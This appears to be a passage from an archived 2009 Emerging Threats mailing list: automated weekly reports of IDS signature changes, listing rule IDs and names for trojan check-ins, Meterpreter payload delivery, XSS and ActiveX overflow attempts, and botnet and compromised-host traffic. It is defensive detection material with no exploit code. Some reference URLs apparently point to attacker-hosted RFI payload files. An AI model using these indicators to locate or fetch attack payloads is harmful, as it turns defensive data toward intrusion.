        2500423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-web_server.rules (1):
        #kevin ross


From emerging at emergingthreats.net  Sat Dec 12 18:00:13 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 12 Dec 2009 18:00:13 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20091212230013.62D144504E@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat Dec 12 18:00:13 2009 [***]

[+++]          Added rules:          [+++]

 2002997 - ET WEB_SERVER Remote File Inclusion (monster list http) (emerging-web_server.rules)
 2010452 - ET TROJAN - Potential Fake AV GET installer.1.exe (emerging-current_events.rules)
 2010453 - ET TROJAN - Potential Fake AV GET installer_1.exe (emerging-current_events.rules)
 2010454 - ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host (emerging-attack_response.rules)
 2010456 - ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt (emerging-web_client.rules)
 2010457 - ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt (emerging-web_server.rules)
 2010458 - ET TROJAN Dropper Checkin - Likely Yahlover Worm (emerging-virus.rules)
 2010459 - ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt (emerging-web_server.rules)
 2010460 - ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt (emerging-web_server.rules)
 2010461 - ET USER_AGENTS Suspicious UA string (MSIE7 an) (emerging-user_agents.rules)
 2010462 - ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt (emerging-web_server.rules)
 2010463 - ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) (emerging-current_events.rules)


[///]     Modified active rules:     [///]

 2003466 - ET WEB_SERVER PHP Attack Tool Morfeus F Scanner (emerging-web_server.rules)
 2007711 - ET TROJAN Srizbi registering with controller (emerging-virus.rules)
 2007827 - ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) (emerging-user_agents.rules)
 2008416 - ET SCAN Httprint Web Server Fingerprint Scan (emerging-scan.rules)
 2009295 - ET USER_AGENTS Suspicious Mozilla User-Agent - Likely Fake (Mozilla/5.0) (emerging-user_agents.rules)
 2009799 - ET WEB_SERVER PHP Attack Tool Morfeus F Scanner - M (emerging-web_server.rules)
 2010012 - ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt (emerging-web_client.rules)
 2010333 - ET USER_AGENTS Suspicious User Agent (CrazyBro) (emerging-user_agents.rules)
 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
 2404000 - ET DROP Known Bot C&C Server Traffic (group 1)  (emerging-botcc.rules)
 2404001 - ET DROP Known Bot C&C Server Traffic (group 2)  (emerging-botcc.rules)
 2404002 - ET DROP Known Bot C&C Server Traffic (group 3)  (emerging-botcc.rules)
 2404003 - ET DROP Known Bot C&C Server Traffic (group 4)  (emerging-botcc.rules)
 2404004 - ET DROP Known Bot C&C Server Traffic (group 5)  (emerging-botcc.rules)
 2404005 - ET DROP Known Bot C&C Server Traffic (group 6)  (emerging-botcc.rules)
 2404006 - ET DROP Known Bot C&C Server Traffic (group 7)  (emerging-botcc.rules)
 2404007 - ET DROP Known Bot C&C Server Traffic (group 8)  (emerging-botcc.rules)
 2404008 - ET DROP Known Bot C&C Server Traffic (group 9)  (emerging-botcc.rules)
 2404009 - ET DROP Known Bot C&C Server Traffic (group 10)  (emerging-botcc.rules)
 2404010 - ET DROP Known Bot C&C Server Traffic (group 11)  (emerging-botcc.rules)
 2404011 - ET DROP Known Bot C&C Server Traffic (group 12)  (emerging-botcc.rules)
 2404012 - ET DROP Known Bot C&C Server Traffic (group 13)  (emerging-botcc.rules)
 2404013 - ET DROP Known Bot C&C Server Traffic (group 14)  (emerging-botcc.rules)
 2404014 - ET DROP Known Bot C&C Server Traffic (group 15)  (emerging-botcc.rules)
 2404015 - ET DROP Known Bot C&C Server Traffic (group 16)  (emerging-botcc.rules)
 2404016 - ET DROP Known Bot C&C Server Traffic (group 17)  (emerging-botcc.rules)
 2404017 - ET DROP Known Bot C&C Server Traffic (group 18)  (emerging-botcc.rules)
 2404018 - ET DROP Known Bot C&C Server Traffic (group 19)  (emerging-botcc.rules)
 2404019 - ET DROP Known Bot C&C Server Traffic (group 20)  (emerging-botcc.rules)
 2404020 - ET DROP Known Bot C&C Server Traffic (group 21)  (emerging-botcc.rules)
 2404021 - ET DROP Known Bot C&C Server Traffic (group 22)  (emerging-botcc.rules)
 2404022 - ET DROP Known Bot C&C Server Traffic (group 23)  (emerging-botcc.rules)
 2404023 - ET DROP Known Bot C&C Server Traffic (group 24)  (emerging-botcc.rules)
 2404024 - ET DROP Known Bot C&C Server Traffic (group 25)  (emerging-botcc.rules)
 2404025 - ET DROP Known Bot C&C Server Traffic (group 26)  (emerging-botcc.rules)
 2404026 - ET DROP Known Bot C&C Server Traffic (group 27)  (emerging-botcc.rules)
 2404027 - ET DROP Known Bot C&C Server Traffic (group 28)  (emerging-botcc.rules)
 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405025 - ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405026 - ET DROP Known Bot C&C Traffic (group 27) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405027 - ET DROP Known Bot C&C Traffic (group 28) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-attack_response.rules (1):
        #by Varga-Perke Balint

     -> Added to emerging-drop-BLOCK.rules (2):
        #  VERSION 1745
        #  Generated 2009-12-12 00:03:02 EDT

     -> Added to emerging-drop.rules (2):
        #  VERSION 1745
        #  Generated 2009-12-12 00:03:02 EDT

     -> Added to emerging-sid-msg.map (15):
        2002997 || ET WEB_SERVER Remote File Inclusion (monster list http) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP || url,doc.emergingthreats.net/2002997 || url,www.sans.org/top20/
        2007827 || ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,downloads.securityfocus.com/vulnerabilities/exploits/36546.html || url,tools.cisco.com/security/center/viewAlert.x?alertId=19135 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER_AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2010452 || ET TROJAN - Potential Fake AV GET installer.1.exe || url,www.malwareurl.com
        2010453 || ET TROJAN - Potential Fake AV GET installer_1.exe || url,www.malwareurl.com
        2010454 || ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host || url,doc.emergingthreats.net/2009581
        2010456 || ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt || cve,2007-5603 || url,www.securityfocus.com/bid/26288/info
        2010457 || ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt || cve,2009-1203 || url,www.securityfocus.com/bid/35475/info
        2010458 || ET TROJAN Dropper Checkin - Likely Yahlover Worm
        2010459 || ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt || cve,2009-1220 || url,tools.cisco.com/security/center/viewAlert.x?alertId=17950 || url,www.securityfocus.com/bid/34307/info
        2010460 || ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt || cve,2008-2165 || url,www.securityfocus.com/bid/29191/info
        2010461 || ET USER_AGENTS Suspicious UA string (MSIE7 an)
        2010462 || ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt || url,www.securityfocus.com/bid/37248/info
        2010463 || ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) || url,n34.biz/id1.txt || url,kb27.co.kr/data/id1.txt

     -> Added to emerging-sid-msg.map.txt (15):
        2002997 || ET WEB_SERVER Remote File Inclusion (monster list http) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP || url,doc.emergingthreats.net/2002997 || url,www.sans.org/top20/
        2007827 || ET USER_AGENTS Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,downloads.securityfocus.com/vulnerabilities/exploits/36546.html || url,tools.cisco.com/security/center/viewAlert.x?alertId=19135 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER_AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2010452 || ET TROJAN - Potential Fake AV GET installer.1.exe || url,www.malwareurl.com
        2010453 || ET TROJAN - Potential Fake AV GET installer_1.exe || url,www.malwareurl.com
        2010454 || ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host || url,doc.emergingthreats.net/2009581
        2010456 || ET WEB_CLIENT ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt || cve,2007-5603 || url,www.securityfocus.com/bid/26288/info
        2010457 || ET WEB_SERVER Possible Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Attempt || cve,2009-1203 || url,www.securityfocus.com/bid/35475/info
        2010458 || ET TROJAN Dropper Checkin - Likely Yahlover Worm
        2010459 || ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt || cve,2009-1220 || url,tools.cisco.com/security/center/viewAlert.x?alertId=17950 || url,www.securityfocus.com/bid/34307/info
        2010460 || ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt || cve,2008-2165 || url,www.securityfocus.com/bid/29191/info
        2010461 || ET USER_AGENTS Suspicious UA string (MSIE7 an)
        2010462 || ET WEB_SERVER Possible Barracuda IM Firewall smtp_test.cgi Cross-Site Scripting Attempt || url,www.securityfocus.com/bid/37248/info
        2010463 || ET CURRENT_EVENTS RFI Scanner Success (Fx29ID) || url,n34.biz/id1.txt || url,kb27.co.kr/data/id1.txt

     -> Added to emerging-user_agents.rules (1):
        #by Deapesh Misra

     -> Added to emerging-web_client.rules (1):
        # (I Thought this one might still be possible to all those devices which go out and aren't updated, happens all the time with Cisco anyway).

     -> Added to emerging-web_server.rules (1):
        #kevin ross

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-drop-BLOCK.rules (2):
        #  VERSION 1738
        #  Generated 2009-12-05 00:03:02 EDT

     -> Removed from emerging-drop.rules (2):
        #  VERSION 1738
        #  Generated 2009-12-05 00:03:02 EDT

     -> Removed from emerging-sid-msg.map (215):
        2007827 || ET TROJAN Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER-AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2500438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
